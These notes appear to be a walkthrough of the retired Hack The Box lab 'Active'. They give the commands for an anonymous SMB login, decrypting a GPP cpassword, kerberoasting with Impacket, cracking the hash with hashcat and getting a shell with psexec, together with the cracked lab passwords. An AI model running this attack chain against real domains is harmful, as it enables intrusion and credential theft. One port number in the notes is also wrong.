GPP/cPassword Attacks

• GPP will keep passwords in an XML file

• Works with smb

• If we find a 334 open we can try to login anonymously Example from HTB - Active - Retired Machine

• Tips: prompt off (will not prompt when dl file) and recurse on (will list everything)

  ┌──(kali㉿kali)-[~]
  └─$ smbclient \\\\10.10.10.100\\Replication
  Enter WORKGROUP\kali's password: 
  Anonymous login successful
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Sat Jul 21 06:37:44 2018
    ..                                  D        0  Sat Jul 21 06:37:44 2018
    active.htb                          D        0  Sat Jul 21 06:37:44 2018
  
                  5217023 blocks of size 4096. 260455 blocks available
  smb: \> prompt off
  smb: \> 

• We can get all the file using mget *

• We are interested in the group.xml file which has been downloaded in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
• We can just copy cpassword and crackit using gpp-decrypt: gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ And we get the password: GPPstillStandingStrong2k18

HTB - Active - privesc

• The password obtain with gpp only gave us user. To root the machine we use kerberoasting again:

  ┌──(kali㉿kali)-[~]
  └─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
  /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
  
  ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
  --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
  active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2022-02-11 16:21:53 
  
  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1

• We can then crack the password with hashcat

  ┌──(root💀kali)-[~/active-directory]
  └─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
  [STRIPPED]
  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968

• And finally get shell using psexec.py (Impacket)

  ┌──(root💀kali)-[~/active-directory]
  └─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100  

GPP - Resources

Pentesting in the Real World: Group Policy Pwnage | Rapid7 BlogRapid7

Group Policy Pwnage